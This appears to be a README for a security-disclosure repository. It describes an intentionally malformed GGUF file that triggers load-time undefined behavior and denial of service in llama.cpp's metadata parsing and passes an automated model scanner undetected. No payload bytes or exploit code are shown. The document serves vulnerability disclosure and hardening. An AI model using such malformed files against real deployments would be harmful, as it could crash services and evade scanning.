library_name: llama.cpp
tags:
- security
- model-file-vulnerability
- mfv
- poc
license: mit
model_format: gguf
security_scan: intentionally-malformed
Overview
This repository contains an intentionally malformed GGUF file created to demonstrate unsafe behavior in GGUF metadata parsing within llama.cpp.
This file is not a machine learning model. It is malformed by design and must not be used for inference or production.
The artifact exists solely for responsible security research, reproducibility, and validation by maintainers and Huntr’s Model File Vulnerability (MFV) triage team.
Reproducer File
- poc_array_overflow.gguf
A minimized GGUF payload (~64 bytes) that triggers load-time undefined behavior during GGUF metadata parsing.
The file was minimized using AFL++ (afl-tmin) to produce a stable, deterministic reproducer.
Technical Summary
- Format: GGUF (binary)
- Model: Not a model (intentionally malformed)
- Attack surface: GGUF metadata parsing
- Trigger phase: Model load (prior to tensor processing)
Malformed, attacker-controlled metadata values are propagated into GGUF parsing logic, resulting in unsafe arithmetic and undefined behavior during model loading.
Security Impact
This PoC demonstrates:
- Unsafe handling of attacker-controlled GGUF metadata
- Load-time undefined behavior in
gguf.cpp - Behavior not detected by automated model scanners
The demonstrated impact is load-time undefined behavior / denial of service. No claims of memory corruption beyond this are made.
Scanner Behavior
When scanned using ProtectAI modelscan, the file reports no issues, despite reliably triggering load-time undefined behavior when parsed by llama.cpp.
Scanner evidence is provided in the associated Huntr submission comments.
Intended Use
This artifact is intended only for:
- Maintainer debugging
- MFV vulnerability validation
- Reproduction of unsafe GGUF parsing behavior
- Security hardening against malformed GGUF metadata
Misuse Warning
This file must not be:
- Used for inference
- Loaded in production systems
- Distributed as a model
- Used outside controlled security testing environments
Disclosure Context
This repository is part of a Huntr Model File Vulnerability (MFV) disclosure.
It does not correspond to a research model, dataset, or paper.
Author
- aTmHnTR
Security researcher (MFV submission)
Contact
All vulnerability coordination must occur through Huntr’s MFV reporting system. Public discussion should avoid vulnerability details.